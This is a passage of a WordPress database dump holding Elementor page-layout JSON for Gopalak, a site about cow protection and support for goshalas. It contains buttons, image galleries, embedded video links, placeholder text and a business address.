here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10405,1733,'_elementor_page_assets','a:0:{}'),(10407,1734,'_elementor_edit_mode','builder'),(10408,1734,'_elementor_template_type','wp-page'),(10409,1734,'_elementor_version','3.7.8'),(10410,1734,'_wp_page_template','elementor_canvas'),(10411,1734,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: 